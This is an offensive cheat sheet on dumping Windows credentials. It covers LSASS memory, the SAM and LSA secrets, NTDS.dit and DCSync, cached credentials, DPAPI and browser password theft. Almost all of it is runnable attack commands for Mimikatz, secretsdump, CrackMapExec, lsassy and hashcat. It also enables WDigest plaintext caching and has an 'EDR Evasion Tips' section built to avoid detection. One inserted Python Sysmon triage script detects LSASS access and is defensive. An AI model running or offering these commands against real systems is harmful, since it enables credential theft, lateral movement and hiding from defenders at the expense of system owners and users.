Credential Dumping
Extract credentials from memory, registry, and Active Directory database to enable lateral movement and privilege escalation.
Tool Installation
pypykatz - Python Mimikatz - pip install pypykatz
secretsdump - Impacket tool - pip install impacket
Credential Locations:
- LSASS - Live memory, plaintext/hashes of logged-in users
- SAM - Local user NTLM hashes
- NTDS.dit - All domain user hashes (DC only)
- LSA Secrets - Service account passwords, autologon
- DPAPI - Browser passwords, saved credentials
LSASS Memory Dump
LSASS (Local Security Authority Subsystem Service) stores credentials in memory. Dumping LSASS gives you credentials for all logged-in users.
What LSASS Contains:
- NTLM password hashes
- Kerberos tickets (TGT, TGS)
- WDigest plaintext passwords (only if UseLogonCredential is enabled; off by default since Windows 8.1 / Server 2012 R2, and on older systems once KB2871997 is installed)
- Cached credentials for offline logon
Mimikatz (Direct)
Direct credential extraction from the running LSASS process. Requires SeDebugPrivilege (local administrators hold it by default). If LSA Protection (RunAsPPL) is enabled, user-mode Mimikatz cannot open LSASS and needs its kernel driver (mimidrv) or another PPL bypass.
# Enable debug privilege first
mimikatz# privilege::debug
# Should return: Privilege '20' OK
# Dump ALL credentials (most common)
mimikatz# sekurlsa::logonpasswords
# Shows: Username, Domain, NTLM, SHA1, and sometimes plaintext
# Dump specific credential types
mimikatz# sekurlsa::wdigest # WDigest (plaintext if enabled)
mimikatz# sekurlsa::kerberos # Kerberos tickets
mimikatz# sekurlsa::msv # NTLM hashes only
mimikatz# sekurlsa::credman # Credential Manager
mimikatz# sekurlsa::dpapi # DPAPI masterkeys
# Export Kerberos tickets
mimikatz# sekurlsa::tickets /export
# Creates .kirbi files for Pass-the-Ticket
# Enable WDigest caching for future logons. Run from an elevated cmd, not the mimikatz prompt;
# it affects new logons only, so existing users must lock/unlock or log on again before their
# plaintext appears
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
Create LSASS Dump File
Create a dump file for offline analysis. Avoids running Mimikatz on the target, but the dump itself is commonly flagged by AV once written to disk, so write it to a location you control and move it off the host promptly.
# Method 1: Task Manager (GUI - simple but logged)
# Right-click lsass.exe > Create dump file
# Saved to: C:\Users\<user>\AppData\Local\Temp\lsass.DMP
# Method 2: Procdump (Sysinternals - often whitelisted)
procdump.exe -ma lsass.exe lsass.dmp
procdump.exe -ma -64 lsass.exe lsass.dmp # Force 64-bit
# Method 3: comsvcs.dll (built-in, no external tools). Run from an elevated PowerShell, which
# already has SeDebugPrivilege enabled, and give a full output path
# Find LSASS PID first
tasklist /fi "imagename eq lsass.exe"
# Or: (Get-Process lsass).Id
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\temp\lsass.dmp full
# Method 4: PowerShell Out-Minidump
# Download: https://github.com/PowerShellMafia/PowerSploit
Import-Module .\Out-Minidump.ps1
Get-Process lsass | Out-Minidump -DumpFilePath C:\temp\
# Method 5: Handle duplication (reuse an LSASS handle already held by another process instead of
# calling OpenProcess on LSASS yourself) - see HandleKatz and nanodump under EDR Evasion Tips
Analyze Dump Offline
Transfer dump to your attack machine for safe analysis without triggering target AV/EDR.
# Mimikatz - Load and analyze dump
mimikatz# sekurlsa::minidump lsass.dmp
mimikatz# sekurlsa::logonpasswords
# pypykatz (Python - works on Linux)
pip install pypykatz
pypykatz lsa minidump lsass.dmp
# Output formats
pypykatz lsa minidump lsass.dmp --json -o creds.json
pypykatz lsa minidump lsass.dmp -g > creds.txt # grep-friendly, one credential per line
# Extract just the hashes
pypykatz lsa minidump lsass.dmp | grep -i ntlm
# pypykatz registry (for saved SAM/SYSTEM/SECURITY hives; SYSTEM is the positional argument)
pypykatz registry SYSTEM --sam SAM --security SECURITY
Remote LSASS Dump
Dump credentials remotely without interactive access. Requires admin credentials on the target. CrackMapExec's maintained fork NetExec (nxc) accepts the same syntax.
# CrackMapExec modules (various evasion techniques)
crackmapexec smb TARGET -u admin -p pass --lsa # LSA secrets
crackmapexec smb TARGET -u admin -p pass -M lsassy # lsassy module
crackmapexec smb TARGET -u admin -p pass -M nanodump # Stealthy dump
crackmapexec smb TARGET -u admin -p pass -M mimikatz # Direct mimikatz
# With hash
crackmapexec smb TARGET -u admin -H NTLM_HASH -M lsassy
# Impacket secretsdump (remote registry + DRSUAPI)
secretsdump.py corp.local/admin:password@TARGET
secretsdump.py -hashes :NTLM_HASH admin@TARGET
# lsassy (standalone)
pip install lsassy
lsassy -d corp.local -u admin -p password TARGET
lsassy -d corp.local -u admin -p password 192.168.1.0/24 # Subnet
# Specify dump method for evasion
lsassy -d corp.local -u admin -p password TARGET -m nanodump
lsassy -d corp.local -u admin -p password TARGET -m comsvcs
SAM Database
The SAM (Security Account Manager) stores local user account NTLM hashes. Useful for Pass-the-Hash on local admin accounts.
Required Files:
- SAM - Contains encrypted NTLM hashes
- SYSTEM - Contains boot key to decrypt SAM
- SECURITY - Contains cached domain creds, LSA secrets
Dump SAM Locally
# Method 1: Registry save (requires admin)
reg save HKLM\SAM C:\temp\SAM
reg save HKLM\SYSTEM C:\temp\SYSTEM
reg save HKLM\SECURITY C:\temp\SECURITY
# Transfer files to attack machine, then extract
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL
# Method 2: Volume Shadow Copy (for locked files)
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\temp\SAM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Method 3: Mimikatz (directly from registry; a live read needs a SYSTEM token)
mimikatz# privilege::debug
mimikatz# token::elevate
mimikatz# lsadump::sam
mimikatz# lsadump::sam /system:C:\temp\SYSTEM /sam:C:\temp\SAM # from saved hives
# Method 4: PowerShell (requires admin)
# Invoke-NinjaCopy reads the hive from the raw NTFS volume, bypassing the file lock
Dump SAM Remotely
# Impacket secretsdump
secretsdump.py corp.local/admin:password@192.168.1.100
# CrackMapExec
crackmapexec smb 192.168.1.100 -u admin -p pass --sam
# With hash
crackmapexec smb 192.168.1.100 -u admin -H NTLM_HASH --sam
NTDS.dit (Domain Controller)
NTDS.dit is the Active Directory database containing all domain user hashes. Requires Domain Admin or local admin on DC.
Location: C:\Windows\NTDS\ntds.dit
File is locked while AD is running - must use shadow copy or IFM backup
Volume Shadow Copy
Create a shadow copy to access locked files.
# Create shadow copy of C: drive
vssadmin create shadow /for=C:
# Note the shadow copy path from output (e.g., HarddiskVolumeShadowCopy1)
# Copy NTDS.dit (AD database)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit
# Copy SYSTEM hive (for decryption key)
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# List shadow copies
vssadmin list shadows
# Delete shadow copy (cleanup)
vssadmin delete shadows /shadow={GUID}
vssadmin delete shadows /all /quiet
ntdsutil / diskshadow
# Method 1: ntdsutil IFM backup (creates clean backup)
ntdsutil "ac i ntds" "ifm" "create full C:\temp\ntds" q q
# Files created:
# C:\temp\ntds\Active Directory\ntds.dit
# C:\temp\ntds\registry\SYSTEM
# C:\temp\ntds\registry\SECURITY
# Extract hashes
secretsdump.py -ntds "C:\temp\ntds\Active Directory\ntds.dit" -system C:\temp\ntds\registry\SYSTEM LOCAL
# Method 2: diskshadow script (for automation)
# Create script.txt with:
# set context persistent nowriters
# add volume c: alias mydrive
# create
# expose %mydrive% x:
diskshadow /s script.txt
copy x:\Windows\NTDS\NTDS.dit C:\temp\NTDS.dit
copy x:\Windows\System32\config\SYSTEM C:\temp\SYSTEM
# Cleanup
diskshadow /s cleanup.txt # unexpose x: ; delete shadows all
Extract Hashes from NTDS.dit
# secretsdump - Full extraction
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL
# Output to files
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -outputfile domain_hashes
# Creates: domain_hashes.ntds, domain_hashes.sam, domain_hashes.secrets
# NTLM hashes only (for Pass-the-Hash)
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-ntlm
# Specific user only
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-user Administrator
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -just-dc-user krbtgt
# With password history
secretsdump.py -ntds NTDS.dit -system SYSTEM LOCAL -history
# Output format: user:RID:LM:NTLM:::
Remote NTDS Dump
# DCSync (preferred method: asks the DC to replicate secrets over DRSUAPI, no file access needed;
# requires the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights, i.e. Domain Admin
# or an account that has been delegated replication)
secretsdump.py -just-dc corp.local/admin:password@dc.corp.local
# Or with Mimikatz
mimikatz# lsadump::dcsync /domain:corp.local /all /csv
Cached Credentials
Domain Cached Credentials (DCC2/mscash2) are written to the SECURITY hive at each interactive domain logon so the user can still log on when no DC is reachable. Slow to crack, but they cover every recent user of the host, not just the sessions currently in memory.
# Cached creds stored in SECURITY hive
# By default, Windows caches last 10 domain logons
# Mimikatz - extract cached creds
mimikatz# lsadump::cache
# From SECURITY hive (offline)
secretsdump.py -security SECURITY -system SYSTEM LOCAL
# CrackMapExec
crackmapexec smb TARGET -u admin -p pass --lsa
# Crack cached credentials with hashcat
# Format: $DCC2$10240#username#hash
# Mode 2100 is VERY slow: each guess costs PBKDF2-HMAC-SHA1 with 10240 iterations,
# orders of magnitude slower than a raw NTLM (mode 1000) guess
hashcat -m 2100 cached_creds.txt wordlist.txt
# Use rules for efficiency (best64.rule ships in hashcat's rules/ directory)
hashcat -m 2100 cached_creds.txt wordlist.txt -r rules/best64.rule
LSA Secrets
LSA secrets store sensitive data including service account passwords, autologon credentials, and VPN passwords.
LSA Secrets May Contain:
- Service account passwords (plaintext!)
- DefaultPassword (autologon)
- VPN/WLAN credentials
- Computer account password
- DPAPI system masterkey
# Mimikatz (a live read of the SECURITY hive needs a SYSTEM token)
mimikatz# privilege::debug
mimikatz# token::elevate
mimikatz# lsadump::secrets
# Impacket secretsdump (includes LSA secrets)
secretsdump.py corp.local/admin:password@TARGET
# CrackMapExec
crackmapexec smb TARGET -u admin -p pass --lsa
crackmapexec smb TARGET -u admin -H NTLM_HASH --lsa
# From SECURITY hive (offline)
secretsdump.py -security SECURITY -system SYSTEM LOCAL
# Look for service accounts with plaintext passwords
# Often see: _SC_<ServiceName> entries holding that service's logon password
Windows Credential Manager
Windows stores saved credentials (RDP, websites, etc.) encrypted with DPAPI. Requires user context or DPAPI keys.
# List saved credentials (user context)
cmdkey /list
# Credential files location
dir C:\Users\<user>\AppData\Local\Microsoft\Credentials\
dir C:\Users\<user>\AppData\Roaming\Microsoft\Credentials\
# Mimikatz - vault credentials
mimikatz# vault::cred
mimikatz# vault::list
# DPAPI credential decryption
# First, get masterkey for the user
mimikatz# dpapi::masterkey /in:"C:\Users\user\AppData\Roaming\Microsoft\Protect\SID\GUID" /rpc
# Then decrypt credential file
mimikatz# dpapi::cred /in:"C:\Users\user\AppData\Local\Microsoft\Credentials\GUID" /masterkey:KEY
# If you have domain admin - extract all DPAPI keys
mimikatz# lsadump::backupkeys /system:dc.corp.local /export
# SharpDPAPI - Automated DPAPI extraction
SharpDPAPI.exe credentials
SharpDPAPI.exe machinevaults
SharpDPAPI.exe backupkey /nowrap
Browser Credentials
Browsers store saved passwords, cookies, and session tokens. Often contain valuable credentials for internal applications.
# SharpChrome - Chrome/Edge credentials (DPAPI-protected)
SharpChrome.exe logins # Saved passwords
SharpChrome.exe cookies # Cookies (session hijacking)
SharpChrome.exe history # Browsing history
# SharpWeb - Multiple browsers
SharpWeb.exe all
SharpWeb.exe chrome
SharpWeb.exe firefox
SharpWeb.exe edge
# LaZagne - All credential stores (browsers, mail, wifi, etc.)
# Download: https://github.com/AlessandroZ/LaZagne/releases
lazagne.exe all
lazagne.exe browsers
lazagne.exe browsers -oJ # JSON output
# Firefox credentials (not DPAPI protected: logins.json is encrypted with a key from key4.db,
# which is guarded only by the optional master password)
# Firefox stores creds in profiles folder
python firefox_decrypt.py # https://github.com/unode/firefox_decrypt
# Locations:
# Chrome: %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data
#         (AES key lives in User Data\Local State, DPAPI-encrypted; recent Chrome versions add
#          App-Bound Encryption, whose key is additionally wrapped with the SYSTEM DPAPI key)
# Firefox: %APPDATA%\Mozilla\Firefox\Profiles\*.default\logins.json
# Edge: %LOCALAPPDATA%\Microsoft\Edge\User Data\Default\Login Data
EDR Evasion Tips
Modern EDR solutions heavily monitor LSASS access. Use these techniques to avoid detection.
EDR Detection Points:
- Direct LSASS handle requests (OpenProcess)
- Known tool signatures (Mimikatz, procdump)
- MiniDumpWriteDump API calls
- Suspicious process lineage
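To make those detection points concrete, here is an added Python example (not from the page and not any vendor's rule) that triages Sysmon Event ID 10 (ProcessAccess) records for the behaviours listed: a non-allowlisted image opening lsass.exe with a memory-read access mask, a call stack through dbghelp/dbgcore (MiniDumpWriteDump), unbacked code in the call stack, and PROCESS_DUP_HANDLE access to a third process that may already hold an LSASS handle. Field names follow Sysmon's schema; the event records, image paths and the allowlist are constructed assumptions.

```python
import json

# OpenProcess access-mask bits that matter for credential theft (Windows SDK values)
PROCESS_VM_READ = 0x0010            # every dumper needs to read LSASS memory
PROCESS_QUERY_INFORMATION = 0x0400
PROCESS_DUP_HANDLE = 0x0040         # steal an existing LSASS handle from another process
PROCESS_ALL_ACCESS = 0x1FFFFF       # mimikatz / procdump default request
DUMP_LIBS = ("dbghelp.dll", "dbgcore.dll")  # both export MiniDumpWriteDump

# Assumed allowlist of images that legitimately open LSASS. Matched by basename for brevity;
# a real rule must match the full signed path, or an attacker simply renames the tool.
ALLOWLIST = {"csrss.exe", "wininit.exe", "lsass.exe", "msmpeng.exe"}


def classify(event: dict):
    """Return an alert dict for a suspicious Sysmon EID 10 record, or None if benign."""
    if event.get("EventID") != 10:
        return None
    source = event["SourceImage"].rsplit("\\", 1)[-1].lower()
    target = event["TargetImage"].rsplit("\\", 1)[-1].lower()
    granted = int(event["GrantedAccess"], 16)
    trace = event.get("CallTrace", "").lower()
    reasons = []
    if target == "lsass.exe" and source not in ALLOWLIST:
        if granted & PROCESS_VM_READ or granted == PROCESS_ALL_ACCESS:
            reasons.append(f"lsass opened with memory-read mask 0x{granted:x}")
        if any(lib in trace for lib in DUMP_LIBS):
            reasons.append("MiniDumpWriteDump call stack (dbghelp/dbgcore) in CallTrace")
        if "unknown(" in trace:
            reasons.append("unbacked code (UNKNOWN) in CallTrace: injected or unhooked caller")
    elif target != "lsass.exe" and granted & PROCESS_DUP_HANDLE and source not in ALLOWLIST:
        # Handle-duplication dumpers never open lsass themselves; the only trace is DUP_HANDLE
        # access to whichever process already holds an LSASS handle. Low severity on its own,
        # so correlate it with a later dump file write or network transfer.
        reasons.append(f"PROCESS_DUP_HANDLE on {target}: possible LSASS handle theft")
    if not reasons:
        return None
    severity = "high" if target == "lsass.exe" else "low"
    return {"source": source, "target": target, "severity": severity, "reasons": reasons}


def triage(json_lines):
    """Run classify() over newline-delimited JSON Sysmon events and keep only the alerts."""
    alerts = []
    for line in json_lines:
        alert = classify(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


# Constructed sample events using Sysmon's field names (not real telemetry)
SAMPLE_EVENTS = [
    json.dumps({"EventID": 10, "SourceImage": r"C:\Tools\procdump.exe",
                "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
                "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5a4|C:\Windows\System32\dbgcore.dll+1a2b3"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18\MsMpEng.exe",
                "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1010",
                "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5a4|C:\Windows\System32\KERNELBASE.dll+2c7de"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
                "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1000",
                "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5a4"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Windows\System32\rundll32.exe",
                "TargetImage": r"C:\Windows\system32\lsass.exe", "GrantedAccess": "0x1FFFFF",
                "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5a4|C:\Windows\System32\dbghelp.dll+4f2a1|C:\Windows\System32\comsvcs.dll+3e5b2"}),
    json.dumps({"EventID": 10, "SourceImage": r"C:\Tools\handlekatz.exe",
                "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x40",
                "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d5a4|UNKNOWN(00000201ABCD1234)"}),
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert["severity"], alert["source"], "->", alert["target"], "|", "; ".join(alert["reasons"]))
```

Of the five constructed events, procdump and the comsvcs rundll32 dump trip the high-severity path (read mask plus a MiniDumpWriteDump stack), Defender is allowlisted despite its 0x1010 mask, the svchost query with 0x1000 (QUERY_LIMITED_INFORMATION) is ignored, and the handle-duplication tool surfaces only as a low-severity DUP_HANDLE event on a third process, which is exactly the blind spot the evasion tools in this section rely on.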
# nanodump - Stealthier LSASS dump using syscalls
# https://github.com/helpsystems/nanodump
nanodump.exe --write C:\temp\lsass.dmp
nanodump.exe --valid # Create valid minidump
# HandleKatz - Dumps using duplicated handles (avoids direct access)
# https://github.com/codewhitesec/HandleKatz
handlekatz.exe --pid <lsass_pid>
# PPLdump - Bypass Protected Process Light (DefineDosDevice technique; Microsoft patched it in 2022,
# so it only works on hosts that have not received that fix)
# https://github.com/itm4n/PPLdump
PPLdump.exe lsass.exe lsass.dmp
# SafetyKatz - Takes no arguments: writes a minidump to C:\Windows\Temp\debug.bin, runs a
# reflectively loaded Mimikatz (sekurlsa::logonpasswords, sekurlsa::ekeys) against it, then deletes the file
SafetyKatz.exe
# MirrorDump - Uses memory-only dump
# https://github.com/CCob/MirrorDump
MirrorDump.exe
# Dump from hibernation file (completely offline): hiberfil.sys is a compressed memory image.
# Convert it to a raw image with a memory-forensics framework (e.g. Volatility) and analyze that;
# Mimikatz itself reads minidumps (sekurlsa::minidump), not hiberfil.sys
# Direct syscalls with custom loader
# Avoid user-mode API hooks by issuing Nt* syscalls directly instead of calling the hooked ntdll/kernel32 exports
External Resources
Mimikatz - GitHub
The definitive Windows credential tool
pypykatz - GitHub
Python implementation for offline analysis
lsassy - GitHub
Remote LSASS dumping with multiple methods
nanodump - GitHub
Stealthy LSASS dump using syscalls
LaZagne - GitHub
Retrieve passwords from many applications
HackTricks - Stealing Credentials
Comprehensive credential extraction guide